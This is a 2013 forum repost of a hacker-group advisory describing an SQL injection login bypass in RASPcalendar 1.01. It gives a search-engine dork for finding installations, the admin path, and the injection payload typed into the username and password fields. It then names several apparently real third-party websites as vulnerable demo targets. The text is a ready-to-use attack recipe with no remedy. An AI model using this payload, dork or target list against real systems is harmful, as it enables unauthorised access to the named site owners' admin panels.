Active Members Fi8sVrs Posted November 10, 2013 Active Members Report Posted November 10, 2013 RASPcalendar version 1.01 suffers from a remote SQL injection vulnerability that allows for login bypass.---------------------------------------------------RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities---------------------------------------------------Author : Hackeri-ALDate : 06-11-2013Vendor Homepage : http://www.rttucson.com/files.htmlSoftware link : http://www.rttucson.com/RASPcalendar.zipVerison : 1.01Tested On : Windows XP------------------------------------------------------------Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"------------------------------------------------------------Example : http://www.usfim.it/RASPcalendar/ : http://site.com/events : http://site.com/calendar : etc...Go to : http://www.usfim.it/RASPcalendar/admin/UserName : 1'or'1PassWord : 1'or'1Login Success Fully ------------------------------------------------------------Vuln sites demo :http://www.usfim.it/RASPcalendar/adminhttp://www.davemitchellassociates.com/events/adminhttp://www.bradandrebecca.com/Calendar/adminhttp://www.hlubline.com/pt/calendar/admin------------------------------------------------------------Found By Hackeri-AL , UAH-Crew Group 2009-2013UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~[~] Legends Of Albania------------------------------------------------------------RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities Quote
